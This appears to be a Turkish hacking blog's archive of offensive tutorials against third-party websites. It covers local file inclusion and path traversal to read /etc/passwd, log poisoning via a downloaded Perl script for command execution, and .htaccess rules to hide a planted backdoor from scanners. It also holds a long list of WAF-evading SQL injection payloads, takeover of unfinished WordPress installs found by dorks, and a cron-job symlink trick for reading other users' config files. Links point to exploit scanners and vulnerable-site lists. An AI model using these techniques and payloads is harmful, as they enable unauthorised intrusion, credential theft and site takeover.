Newest Post

Archive for Haziran 2019

Merhaba arkadaşlar bugün sizlere ​

siteleri access_log inject ederek lfı siteleri rfı çevirmeyi anlatacağım rfı çevirmekten kastım komut çalıştırmak


sitemizi bulduk arkadaşlar şimdi sitede lfı varmı kontrol ediyoruz


../../../../../../../../../../../../../../../etc/passwd denedik ama olmadı arkadaşlar 


şimdi sonuna ekleyerek bypasslıyoruz yani şu şekilde 
../../../../../../../../../../../../../../../etc/passwd


şimdi access_logun dizinini bulmak için /etc/httpd/conf/httpd.conf yapıyoruz 
ve ctrl+u yapıyoruz ve kendi sitemizi kaynak kodlarında arıyoruz



gördüğünüz gibi 1523 satırda access_log dizini bulduk dizini /home/pro_99/null.com/access_log
1513 satıra bakacak olursak 12.34.5.678:80 (12.34.5.678 temsilidir) server ip ve 80 portunu görüyoruz bu port işimize yarayacak bir kaç adım sonra



şimdi size bi perl script vereceğim onla siteye inject edeceğiz

perl scriptadı.pl hedef.com 80
burdaki 80 daha önce serverde vardı :80 şeklinde buraya serverde açık herangi portu girebilirsiniz
script indir --> http://link.tl/2hVQE


şimdi siteye gidin ve ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log
girin ekranda v0pcr3w arayın eğer ordaysa başarılı olmuş demektir 


sitede ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log&cmd= şeklinde artık komut çalıştırabilirsiniz ben id komutuna bakacağım çalışıp çalışmadığını görün diye yukarda gördüğünüz gibi çalışıyor



istediğiniz bir konu veya sorunuz varsa yorum yapın


comment if you have a topic or question you want


merhabalar bugün sizlere websitenizi .htaccess editleyere bazı saldırılardan korunmayı ve sitenizi güvenliği için bir kaç yoldan bahsedeceğim


.htaccess (hypertext access file) 

Genelde Sunucunun Ana dizininde olan
Adı olmayan Ayarlar Uygulamalar Yapışan Dosyadır. Güvenlik ,Yetki, Düzenleme, Ayar, kısıtlama vb.
işlemleri yapabiliyoruz.
bu gün Biz Sadece Güvenliğin Bir kısmını Ele Alacağız .



Scannerlardan korunma


örnek bi sitenin içindesiniz çok önemli bir site
siteye backdoor bıraktınız bide shell bunu bulmamaları içinde bunu kullanabilirsiniz

bu alacağımız önlem sayesinde Acunetix,sqlmap,nikto gibi 
Scannerlardan korunmamızı sağlıyor bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .
bunu web scannerlere göre editleyebilirsiniz



RewriteEngine On[/B][/B][/COLOR][/SIZE][/CENTER]
[SIZE=4][COLOR=#000000][B]
[CENTER][B]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} Acunetix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> 



sql injection Engelleme


günümüzün en popiler açıklarından biri sql injection her sistemde olabilir nerdeyse bütün ülkelerin sitelerinde mevcut bir açık eğer sizin sitenizde sql açığı varsa ve bunun nasıl giderileceğini bilmiyorsanız en azından .htaccess dosyası ile bunu bi nebze önleyebilirsiniz ama şunu söylemekte fayda var buda kesin bir çözüm değil
bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .


RewriteEngine On[/SIZE][/COLOR][/B][/B][/B][/CENTER]
[B][B][B][COLOR=rgb(0, 0, 0)][SIZE=4]
[CENTER]RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|<|>|/{2,999}).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\\.0\\.0\\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} [^a-z](|order|union|declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F]



XSS engelleme 


xss açığını biliyorsunuzdur bu açığı kesin olarak kapatmak için .htaccess editleyebilirz
şimdi bu ne işe yarayacak saldırgan siteye xss denerse hata ile karşılaşacak
örnek 

index.php?id=<script>alert(’Red’)</script>

yaptığımız anda 403 hatası verecektir.


RewriteEngine On[/B][/CENTER][/B][/CENTER]
[B]
[CENTER][B][CENTER]RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php|forum.php|yaz.php [F,L]



websitesi erişim kapatma


örneğin bi websitesiniz var ve siz bu websitesinin a hack forumunda paylaşıldığını 
gördünüz sitenizi o siteden gelenlere kapatmak için


<Files ~ "^.(htaccess|htpasswd)$">[/SIZE][/COLOR][/B][/CENTER]
[B][COLOR=rgb(0, 0, 0)][SIZE=5]
[CENTER]deny from all
</Files>
order deny,allow
deny from ahackforumu.com
allow from 192.168.1.1
allow from http://google.com


allow from yazarak izin verip 
denny from yazarak engellye biliriz .



ülkelere erişim kapatma


örnek burda IPCountry TR yaparak siteyi TR'den gelenlere kapadık 


SetEnvIf CF-IPCountry TR BuzzOff=1[/B][/CENTER]
[B]
[CENTER]Order allow,deny
Allow from all
Deny from env=BuzzOff

ORDER BY


/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/


UNION SELECT



/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+


information_schema.tables 



/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


Concat



CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))


Group Concat


/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)





istediğiniz bir konu veya sorunuz varsa yorum yapın

comment if you have a topic or question you want

WAF BYPASS ÇEŞİTLERİ

23 Haziran 2019 Pazar
Tag :, Tag :, Tag :
zone-h tool
http://link.tl/2hEgD


zone-h tools

22 Haziran 2019 Cumartesi
Tag :, Tag :, Tag :

joomla exploit scaner

find version exploit

dowload -->http://link.tl/2hwRH




joomla exploit scaner

20 Haziran 2019 Perşembe
20168 sql dork
http://link.tl/2hurk

20168 sql dork

19 Haziran 2019 Çarşamba

google dork

inurl : /blog/wp-admin/install.php
          /wordpress/wp-admin/install.php



kendi dilinizi seçin ve kuruluma başlayın



çalışan db bilgilerini girin


kurulum tamamdır şimdi siteye wp-login.php ile gidin bilgileri girin



ve site elinizde




Merhaba arkadaşlar bugün sizlere
admin panel kayak kodlarından sitenin giriş bilgilerini almayı göstereceğim



gördüğünüz gibi admin panelimiz şimdi ctrl+u ile kaynak kodlarına gidelim


şimdi kaynak kodlarında url üzerinden denemeler yapıyoruz admin.php - home.php -dashboard.php gibi amacımız eğer şifreyi girseydik bizi hangi sayfaya atacağını bulmak



gördüğünüz gibi doğru olanı bulduk şimdi biraz kurcalıyoruz


evet user diye aradık ve manage_user.php bulduk bu bizim işimize yarabilir o zaman oraya gidelim


evet bu sayfayıda kurcaladık ve bulduk add_user.php?id=1 bu site içinde user ekleme editleme bölümü şimdi bide oraya gidelim 



ve biraz kurcalayınca değerleri bulduk gördüğünüz gibi bu kadar kolay

bu aşama işi arkadaşlar her sitede çalışmaz ama denemek lazım hedef sitede işinize yarar


-474 admin panel denemesi yapıyor

güzel bi script

şurda hata yapmayın taratılacak site girerken site sonunda / olmalı
örnek meacms.mea.gov.in/ bu şekilde




http://link.tl/2hleb

ÖZELLİKLER

[+] Auto Cms Detect
[1] WordPress :
[+] WP All Import
[+] Adblock Blocker [+] Blaze
[+] Download Manager
[+] Catpro [+] Cherry Plugin
[+] Power Zoomer
[+] Formcraft [+] levoslideshow
[+] Revslider Upload Shell
[+] Gravity Forms [+] Revslider Dafece Ajax
[+] Simple Ads Manager
[+] Revslider Get Config [+] Showbiz [+] Slide Show Pro
[+] dzs-zoomsounds
[+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] Reflex Gallery
[+] PHP Event Calendar
[+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] Synoptic [+] Wp Shop
[+] Com Jdownloads Index
[+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads [+] Com Fabrik [+] Com Foxcontact
[4] PrestaShop
[+] Com Ads Manager [+] Com Blog [+] Com Users [+] Com Weblinks [+] mod_simplefileupload [3] DruPal [+] Add Admin
[+] homepageadvertise
[+] columnadverts [+] soopamobile [+] soopabanners [+] Vtermslideshow [+] simpleslideshow [+] productpageadverts [+] homepageadvertise2
[+] advancedslider
[+] jro_homepageadvertise [+] attributewizardpro [+] 1attributewizardpro [+] AttributewizardproOLD [+] attributewizardpro_x [+] cartabandonmentpro
[+] nvn_export_orders
[+] cartabandonmentproOld [+] videostab [+] wg24themeadministration [+] fieldvmegamenu [+] wdoptionpanel [+] pk_flexmenu [+] pk_vertflexmenu [+] megamenu
[+] SQL injection
[+] tdpsthemeoptionpanel [+] psmodthemeoptionpanel [+] masseditproduct [5] Lokomedia


+Download ICG Bot : ( tool by 04x )
+Download python 2.7.14 :
Merhaba arkadaşlar bugün sizlere
cron job bypass ile /etc/passwd okunmayan serverlerde /etc/passwd okumayı anlatacağım


öncelikle sitemizde bakıyoruz /etc/passwd hepsini okuyamıyoruz


şimdi cpanele gidelim tabi cpaneli cracklemeniz lazım



alt kısımda cron jobs buluyoruz arkadaşlar 


şimdi yukarıda email kısmı var buraya sallama bir mail girin maille işimiz yok


Once Per Minute seçin şimdi aşağıda command kısmı var işimiz orayla

Kod:
ln -s /etc/passwd 1.txt
komutumuz bu arkadaşlar bu komut sayesinde filemanagerde 1.txt oluşacak ve bize /etc/passwd okuma şansı sunacak

Filemanagere gidiyoruz dosya hemen oluşmaz arkadaşlar sayfayı yeniliyoruz
30-40 sn sonra oluşuyor
dosyaya tıklayıp editi seçiyoruz
gördüğünüz gibi tüm /etc/passwd okuduk

aynı şekilde 
Kod:
ln -s /etc/named.conf 2.txt

ile named.conf okuduk 


gördüğünüz gibi arkadaşlar
burdan sonrası sizde
named.conf dan user olan siteyi bulup aynı şekilde config bilgilerini 
çekebilirsiniz

örnek sitemiz MyBB forum
user --> kartal

ln -s /home/kartal/public_html/inc/config.php 3.txt

şeklinde sitenin config bilgilerini alabilirsiniz

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

1400 sql açıklı site

10 Haziran 2019 Pazartesi

// Copyright © WELCOME Se☪uЯity Candidate //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //